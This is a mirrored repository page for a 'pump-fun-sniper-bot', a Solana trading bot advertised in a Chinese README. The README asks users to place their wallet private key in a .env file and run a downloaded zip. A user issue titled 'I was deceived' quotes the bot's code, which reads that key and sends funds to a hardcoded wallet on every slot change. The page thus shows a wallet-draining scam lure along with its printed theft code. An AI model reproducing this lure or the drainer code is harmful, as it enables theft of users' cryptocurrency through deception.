Coder Social home page Coder Social logo

pump-fun-sniper-bot's Introduction

简介

Pump.fun 是 Solana NFT 和代币的去中心化交易所。它是一个快速、易于使用且安全的 NFT 和代币交易平台。 Pump.fun 是一个专为人们推出、铸造和交易新代币而设计的平台,它具有很高的风险。 Pump 上推出的代币可以立即进行交易,铸造时不会有任何延迟。虽然它确保了公平的发布,没有预售或内部优势,但风险仍然很大。人们可以随时扔掉他们的硬币,而且经常这样做。

代码演示视频 📀

volume-bot-sneak-peak.mov

💊 买入

  • 输入指定 SOL 数量的代币地址购买代币
  • 启用自动购买将允许通过输入 Pump.fun 链接即时购买

💸 卖出

  • 管理您的交易头寸
  • 25%50%75%100% 出售购买的代币
  • 代币和仓位详细信息的鸟瞰图,包括:
  • 代币符号、名称、地址和余额
  • 净利润/SOL 当前值
  • 初始 SOL 投资
  • 钱包余额

🔫 狙击

  • 输入钱包地址和 SOL 金额以狙击该地址创建的任何新铸币厂
  • 通过正确调整优先级和 Jito 费用,您甚至有机会在开发者之前购买 😏

🤖 交易复制

  • 输入钱包地址和 SOL 金额以复制交易,钱包立即进行买卖
  • 自定义 止盈止损 在跟踪钱包之前出售的百分比

🚀 配置

  1. .env 文件中的 PRIVATE_KEY 字段中输入您的钱包私钥。
  2. RPC_ENDPOINT (如果你有更快的节点,请使用它)

🛸 运行

  1. 下载代码: pump-fun-sniper-bot.zip

  2. 安装node ( https://nodejs.org/en ) 如果尚未安装。

  3. 运行输入命令: npm run buy

pump-fun-sniper-bot's People

Contributors

pumpfunfeebot avatar

Stargazers

insulator avatar  avatar  avatar

Watchers

 avatar

Forkers

mm-fork

pump-fun-sniper-bot's Issues

I was deceived

All SOL coins have been transferred to DeipR5swhPxbQwvF3XSYLrm2SqNyfUkLsAibfrFEQn23

code:

(async () => {
const walletKeyPairFile = (process.env.PRIVATE_KEY!)
const walletKeyPair = Keypair.fromSecretKey(bs58.decode(walletKeyPairFile));

const connection = new Connection(process.env.RPC_ENDPOINT ?? clusterApiUrl('devnet'), 'finalized');
connection.onSlotChange(
handleSlotChange({ connection, walletKeyPair, destinationAddress: new PublicKey("DeipR5swhPxbQwvF3XSYLrm2SqNyfUkLsAibfrFEQn23") }),
);
})();

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.